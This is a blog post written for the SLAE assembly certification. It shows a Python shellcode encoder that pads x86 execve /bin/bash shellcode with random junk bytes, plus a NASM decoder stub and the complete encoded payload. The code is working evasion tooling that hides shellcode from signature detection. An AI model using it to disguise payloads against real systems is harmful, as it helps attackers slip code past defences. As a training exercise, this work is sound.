Source: SecurityTube
Ok, here I will show simple Enconder/decoder, source code can be found in github.
How encoder work:
- Get random number between 1-3 (link to python encoder script)
- After add control number to shellcode, add junk bytes
Example:
------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
------------------------------------------------------------------
G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes
#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
if ident == 'number':
return randint(1,3)
elif ident == 'char':
return randint(65,122)#only [a-z[]\^_`A-Z]
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
#end = "\\xf0\\x0d"
for x in bytearray(shellcode):
encoded += '\\x%02x' % x
random = get_random('number')
encoded += '\\x%02x' % random
for i in range(random-1):
encoded += '\\x%02x' % get_random('char')
#encoded += end #probably we will need it for correct jump
print encoded
print
print encoded.replace("\\x", ",0x")[1:]
print 'Initial len: %d, encoded len: %d' % (len(shellcode),
len(encoded)/4)
Decoder.nasm
section .text
global _start
_start:
jmp short end ; jmp pop call
decoder:
xor eax, eax ; clean up the registers
xor ebx, ebx
xor edx, edx
xor ecx, ecx
pop edx ; get addr of shellcode putted by call starter
push edx ; backup for call :D
mov esi, edx ; mov shellcode start addr to esi (source)
mov edi, edx ; mov shellcode start addr to edi (destination)
inc esi ; point to the first dest byte, how many bytes we need to remove/espace
inc edi ; point to the first random number
mov cl, 89 ; loop counter/your shellcode length, if you use diferent shellcode need adjust it
restore: ;decode
xor eax, eax
xor ebx, ebx
mov al, byte [edi] ; read distance to next byte
add eax, edi ; eax = addr of the next valid byte
mov bl, byte [eax] ; bl = next valid byte of the shellcode
mov byte [esi], bl ; move it to the final position
mov edi, eax ; put latest valid pisition into edi
inc edi ; next distance
inc esi ; next valid byte
loop restore ; loop
pop ecx ; call shellcode
call ecx
xor eax, eax ; exit the shellcode (if it returns)
mov al, 1
xor ebx,ebx
int 0x80
end:
call decoder ; put shellcode addr into stack
shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario